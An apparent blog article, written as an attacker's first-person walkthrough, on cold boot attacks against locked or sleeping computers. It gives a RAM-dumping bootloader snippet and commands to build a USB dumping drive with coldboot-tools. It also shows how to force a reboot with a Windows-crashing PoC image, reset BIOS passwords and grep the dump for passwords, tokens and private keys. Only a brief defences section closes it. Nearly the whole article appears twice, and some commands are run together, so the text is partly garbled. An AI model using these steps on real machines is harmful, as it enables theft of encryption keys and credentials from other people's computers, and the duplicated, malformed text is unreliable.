It's a familiar situation: you step away from your computer for five minutes, lock the screen because you're a good person and a security nut. The drive is encrypted, the password is strong, all updates are up. You come back and think your data is completely safe. Spoiler: it's a total disaster.
If I had your computer in my hands for those five minutes, I couldn't care less about your password, BitLocker, or any Microsoft patches. I'd simply extract the keys directly from the RAM, and your encryption would be completely ruined. It's called a cold boot attack, and today I'll tell you how it works in practice.
---
What happens when you lock the screen
You press Win+L, and the system goes into standby mode. The drive appears to be inactive, but the RAM continues to work and store everything that was there. And that's where all the good stuff is:
Disk encryption keys (BitLocker, FileVault, LUKS) – otherwise, how would the system decrypt data on the fly?
Browser passwords – Chrome and Firefox keep them in memory while you're working.
Messenger messages, if you haven't closed the window.
Private SSH and GPG keys, if you used them.
Session cookies – to log in to your website under your name.
And the funniest thing is, to get all this, you don't even need to break your password. Just force the computer to reboot without clearing the memory.
---
Why a simple reboot isn't suitable
If I click "Restart" from the Windows or Linux menu, the system will gently close processes, unload data, and modern operating systems can even forcefully erase the memory upon shutdown. I don't need that.
I need a hard reset—one that simply restarts the processor without the memory controller receiving the "clean everything" command. There are various methods:
Pulse the power and quickly turn it back on.
Press the hardware reset button on the case.
Trigger a "blue screen of death" (BSOD) with a specially prepared flash drive—then the system crashes instantly, without having time to clean anything up.
Desktops are easier to handle. Laptops are more complicated—either the battery is non-removable or there's no reset button. But I'll tell you how to deal with them later.
---
Physics of the process: why data doesn't disappear immediately
There's one important thing to understand here. DRAM memory is designed so that after a power outage, data is retained in it not for nanoseconds, but for quite a few seconds. This is called data remanence.
At room temperature, you can unplug the power, and the data will live on the chip for another 5-10 seconds. This is enough to reboot and run the code from the flash drive. If you cool the memory with liquid nitrogen (and such exploits have been used), the data can be stored for minutes.
So when I pull the power, the memory isn't instantly reset. It just freezes, and I have a small window to read it.
---
What I need for the attack
Essentially, just a flash drive with the right hardware. No complex hardware, no programmers. A regular USB drive that can boot.
I use a special image that does two things:
1. Reads physical memory directly, via BIOS interrupts.
2. Dumps the entire RAM contents to a separate partition on the same flash drive.
This leaves the flash drive's file system intact, so I can work with the dump normally later.
Here's what the assembly code snippet that does this looks like (just for clarity, you won't have to write it yourself):
[org 0x7C00] [bits 16]
resetdisk: mov ah, 0x00 mov dl, 0x00 int 0x13 jc resetdisk
getmem: mov bx, 0x0000 mov es, bx mov bx, 0x8000
writedisk: mov ah, 0x03 mov al, 0x01 mov ch, 0x00 mov cl, 0x03 mov dh, 0x00 mov dl, 0x80 int 0x13
times 510 - ($ - $$) db 0x00 db 0x55,0xAA times 8096 db 0xfe
It reads memory at ES:BX and writes to disk using interrupt 13h. If you run it in a loop, it will fetch all the RAM.
---
Preparing the USB drive
You don't have to compile this manually. There's a ready-made set of coldboot-tools. Here's how:
Download the image:
wgethttps://github.com/baselsayeh/coldboot-tools/releases/download/2/bios_memimage64.zip
Write the bootloader to the USB drive's MBR (let's say it's /dev/sdb):
sudo dd if=grldr.mbr of=/dev/sdb conv=notrunc
Create a partition. Important: not the entire USB drive, but with some extra space. Let's say the USB drive is 16 GB. Make the first partition 8 GB, and leave the rest empty—it will store the RAM dump.
Format the partition in FAT:
sudo mkfs.fat/dev/sdb1
Mount and copy the boot files:
sudo mount/dev/sdb1 /media/usb cp grldr menu_sec_part.lst scraper*.bin/media/usb/
The bootloader configuration menu_sec_part.lst looks something like this:
title Dump the RAM(64bit Halt) map(hd0) (hd1) map(hd0,1)+1 (hd0) map--hook rootnoverify(hd0,0) chainloader--force --boot-cs=0x7c0 --boot-ip=0x200 (hd1,0)/boot/grub4dos/scraper/scraper64_haltonly.bin
After this, the flash drive is ready. It can boot and dump RAM to the second partition.
---
How an attack works in reality
Then it's simple. I go to the computer while you're away. If I need to do it quickly, I just pull the power button. If the computer is in sleep mode, that's even better—the memory is active, and I can immediately insert the flash drive and choose to boot from USB.
On many machines, you can enter the Boot Menu with F8, F12, or Esc. Even if the BIOS has a password, it's often reset by resetting it with a jumper or removing the battery—it takes a couple of minutes.
As soon as the computer boots from my flash drive, the script starts copying the memory. After a few minutes (depending on the amount of RAM), the dump is ready. I take the flash drive and leave.
You come back, see that the computer has rebooted, think, "Damn, something's wrong," enter the password, and continue working. And I've already left with a complete dump of your RAM.
---
What can I find in the dump?
After I have the flash drive, I convert the raw partition to a file:
sudo dd if=/dev/sdb2 of=ram.img bs=512 status=progress
Sometimes the dump is offset – this is fixed with:
truncate -s $[0x53000] pad.img cat pad.img ram.img> _ram.img
Now the fun begins. I simply search for strings:
strings ram.img| grep -i password
You can search for specific keywords: cookie, passw, login, token, key, PRIVATE KEY.
But that's just scratching the surface. Truly valuable things are found by signatures:
RSA keys – by PEM/PKCS headers.
Photos – by JFIF/EXIF.
PDF documents — by %PDF.
ZIP/RAR archives — by local headers.
If you dig deeper, the dump contains operating system structures that allow you to reconstruct the sequence of events, processes, and open files. This is already at the level of forensics, but it's still possible.
---
What about laptops?
Laptops are more complicated, but not hopeless. Firstly, not all have a hardware reset button. Secondly, the battery is often non-removable. But there are workarounds.
You can trigger a BSOD with a specially prepared flash drive with a corrupted file system. For example, there's a ready-made proof-of-concept (PoC) that creates an image guaranteed to crash Windows upon connection:
git clonehttps://github.com/mtivadar/windows10_ntfs_crash_dos dd if=tinyntfs of=/dev/sdb
You insert such a flash drive—the system crashes to a blue screen, and you can reboot with your bootable flash drive.
If the laptop is in hibernation, it's perfect. The memory is active, so I simply insert the flash drive, select boot from USB (if I'm lucky with the Boot Menu), and dump it.
---
How realistic is this in 2025?
Many people think that cold booting is something reserved for intelligence agencies and liquid nitrogen labs. In reality, any schoolchild with a flash drive and access to a computer can do it. The only requirement is the ability to boot from USB.
And that's a problem right now. On many corporate computers, booting from external drives is disabled in the BIOS, and the BIOS itself is password-protected. However:
The BIOS password can often be reset by a jumper on the motherboard or by removing the battery.
On home and many office computers, booting from a flash drive is either enabled or enabled through the Boot Menu without a password.
So there's a chance.
---
How to protect against this
The most reliable way is a complete shutdown. If you're really concerned about your data, don't use sleep or hibernation. Just turn it off—and the memory is empty.
The second option is to use TRESOR or similar kernel patches that store encryption keys in processor registers rather than RAM. But this is an exotic option; it's not found on regular systems.
The third option is to configure the BIOS to disable booting from external drives and set a strong BIOS password. But as I already mentioned, it can be reset.
The fourth option is to use software that forcibly wipes RAM when shutting down. This slows down the shutdown and doesn't always work correctly, but it's better than nothing.
And most importantly, physical access. If someone can get to your computer, consider all your defenses ineffective. This is a fundamental security principle.
A cold boot attack isn't some 2010s hype, but a completely viable method that allows you to bypass disk encryption and extract keys, passwords, and any data from RAM. All an attacker needs is a few minutes of physical access and a bootable USB drive.
So the next time you step away from your computer for a moment, consider: is your data really safe? Because a lock screen password is the last line of defense, and it doesn't solve anything against a cold boot.
If I had your computer in my hands for those five minutes, I couldn't care less about your password, BitLocker, or any Microsoft patches. I'd simply extract the keys directly from the RAM, and your encryption would be completely ruined. It's called a cold boot attack, and today I'll tell you how it works in practice.
---
What happens when you lock the screen
You press Win+L, and the system goes into standby mode. The drive appears to be inactive, but the RAM continues to work and store everything that was there. And that's where all the good stuff is:
Disk encryption keys (BitLocker, FileVault, LUKS) – otherwise, how would the system decrypt data on the fly?
Browser passwords – Chrome and Firefox keep them in memory while you're working.
Messenger messages, if you haven't closed the window.
Private SSH and GPG keys, if you used them.
Session cookies – to log in to your website under your name.
And the funniest thing is, to get all this, you don't even need to break your password. Just force the computer to reboot without clearing the memory.
---
Why a simple reboot isn't suitable
If I click "Restart" from the Windows or Linux menu, the system will gently close processes, unload data, and modern operating systems can even forcefully erase the memory upon shutdown. I don't need that.
I need a hard reset—one that simply restarts the processor without the memory controller receiving the "clean everything" command. There are various methods:
Pulse the power and quickly turn it back on.
Press the hardware reset button on the case.
Trigger a "blue screen of death" (BSOD) with a specially prepared flash drive—then the system crashes instantly, without having time to clean anything up.
Desktops are easier to handle. Laptops are more complicated—either the battery is non-removable or there's no reset button. But I'll tell you how to deal with them later.
---
Physics of the process: why data doesn't disappear immediately
There's one important thing to understand here. DRAM memory is designed so that after a power outage, data is retained in it not for nanoseconds, but for quite a few seconds. This is called data remanence.
At room temperature, you can unplug the power, and the data will live on the chip for another 5-10 seconds. This is enough to reboot and run the code from the flash drive. If you cool the memory with liquid nitrogen (and such exploits have been used), the data can be stored for minutes.
So when I pull the power, the memory isn't instantly reset. It just freezes, and I have a small window to read it.
---
What I need for the attack
Essentially, just a flash drive with the right hardware. No complex hardware, no programmers. A regular USB drive that can boot.
I use a special image that does two things:
1. Reads physical memory directly, via BIOS interrupts.
2. Dumps the entire RAM contents to a separate partition on the same flash drive.
This leaves the flash drive's file system intact, so I can work with the dump normally later.
Here's what the assembly code snippet that does this looks like (just for clarity, you won't have to write it yourself):
[org 0x7C00] [bits 16]
resetdisk: mov ah, 0x00 mov dl, 0x00 int 0x13 jc resetdisk
getmem: mov bx, 0x0000 mov es, bx mov bx, 0x8000
writedisk: mov ah, 0x03 mov al, 0x01 mov ch, 0x00 mov cl, 0x03 mov dh, 0x00 mov dl, 0x80 int 0x13
times 510 - ($ - $$) db 0x00 db 0x55,0xAA times 8096 db 0xfe
It reads memory at ES:BX and writes to disk using interrupt 13h. If you run it in a loop, it will fetch all the RAM.
---
Preparing the USB drive
You don't have to compile this manually. There's a ready-made set of coldboot-tools. Here's how:
Download the image:
wgethttps://github.com/baselsayeh/coldboot-tools/releases/download/2/bios_memimage64.zip
Write the bootloader to the USB drive's MBR (let's say it's /dev/sdb):
sudo dd if=grldr.mbr of=/dev/sdb conv=notrunc
Create a partition. Important: not the entire USB drive, but with some extra space. Let's say the USB drive is 16 GB. Make the first partition 8 GB, and leave the rest empty—it will store the RAM dump.
Format the partition in FAT:
sudo mkfs.fat/dev/sdb1
Mount and copy the boot files:
sudo mount/dev/sdb1 /media/usb cp grldr menu_sec_part.lst scraper*.bin/media/usb/
The bootloader configuration menu_sec_part.lst looks something like this:
title Dump the RAM(64bit Halt) map(hd0) (hd1) map(hd0,1)+1 (hd0) map--hook rootnoverify(hd0,0) chainloader--force --boot-cs=0x7c0 --boot-ip=0x200 (hd1,0)/boot/grub4dos/scraper/scraper64_haltonly.bin
After this, the flash drive is ready. It can boot and dump RAM to the second partition.
---
How an attack works in reality
Then it's simple. I go to the computer while you're away. If I need to do it quickly, I just pull the power button. If the computer is in sleep mode, that's even better—the memory is active, and I can immediately insert the flash drive and choose to boot from USB.
On many machines, you can enter the Boot Menu with F8, F12, or Esc. Even if the BIOS has a password, it's often reset by resetting it with a jumper or removing the battery—it takes a couple of minutes.
As soon as the computer boots from my flash drive, the script starts copying the memory. After a few minutes (depending on the amount of RAM), the dump is ready. I take the flash drive and leave.
You come back, see that the computer has rebooted, think, "Damn, something's wrong," enter the password, and continue working. And I've already left with a complete dump of your RAM.
---
What can I find in the dump?
After I have the flash drive, I convert the raw partition to a file:
sudo dd if=/dev/sdb2 of=ram.img bs=512 status=progress
Sometimes the dump is offset – this is fixed with:
truncate -s $[0x53000] pad.img cat pad.img ram.img> _ram.img
Now the fun begins. I simply search for strings:
strings ram.img| grep -i password
You can search for specific keywords: cookie, passw, login, token, key, PRIVATE KEY.
But that's just scratching the surface. Truly valuable things are found by signatures:
RSA keys – by PEM/PKCS headers.
Photos – by JFIF/EXIF.
PDF documents — by %PDF.
ZIP/RAR archives — by local headers.
If you dig deeper, the dump contains operating system structures that allow you to reconstruct the sequence of events, processes, and open files. This is already at the level of forensics, but it's still possible.
---
What about laptops?
Laptops are more complicated, but not hopeless. Firstly, not all have a hardware reset button. Secondly, the battery is often non-removable. But there are workarounds.
You can trigger a BSOD with a specially prepared flash drive with a corrupted file system. For example, there's a ready-made proof-of-concept (PoC) that creates an image guaranteed to crash Windows upon connection:
git clonehttps://github.com/mtivadar/windows10_ntfs_crash_dos dd if=tinyntfs of=/dev/sdb
You insert such a flash drive—the system crashes to a blue screen, and you can reboot with your bootable flash drive.
If the laptop is in hibernation, it's perfect. The memory is active, so I simply insert the flash drive, select boot from USB (if I'm lucky with the Boot Menu), and dump it.
---
How realistic is this in 2025?
Many people think that cold booting is something reserved for intelligence agencies and liquid nitrogen labs. In reality, any schoolchild with a flash drive and access to a computer can do it. The only requirement is the ability to boot from USB.
And that's a problem right now. On many corporate computers, booting from external drives is disabled in the BIOS, and the BIOS itself is password-protected. However:
The BIOS password can often be reset by a jumper on the motherboard or by removing the battery.
On home and many office computers, booting from a flash drive is either enabled or enabled through the Boot Menu without a password.
So there's a chance.
---
How to protect against this
The most reliable way is a complete shutdown. If you're really concerned about your data, don't use sleep or hibernation. Just turn it off—and the memory is empty.
The second option is to use TRESOR or similar kernel patches that store encryption keys in processor registers rather than RAM. But this is an exotic option; it's not found on regular systems.
The third option is to configure the BIOS to disable booting from external drives and set a strong BIOS password. But as I already mentioned, it can be reset.
The fourth option is to use software that forcibly wipes RAM when shutting down. This slows down the shutdown and doesn't always work correctly, but it's better than nothing.
And most importantly, physical access. If someone can get to your computer, consider all your defenses ineffective. This is a fundamental security principle.
A cold boot attack isn't some 2010s hype, but a completely viable method that allows you to bypass disk encryption and extract keys, passwords, and any data from RAM. All an attacker needs is a few minutes of physical access and a bootable USB drive.
So the next time you step away from your computer for a moment, consider: is your data really safe? Because a lock screen password is the last line of defense, and it doesn't solve anything against a cold boot.
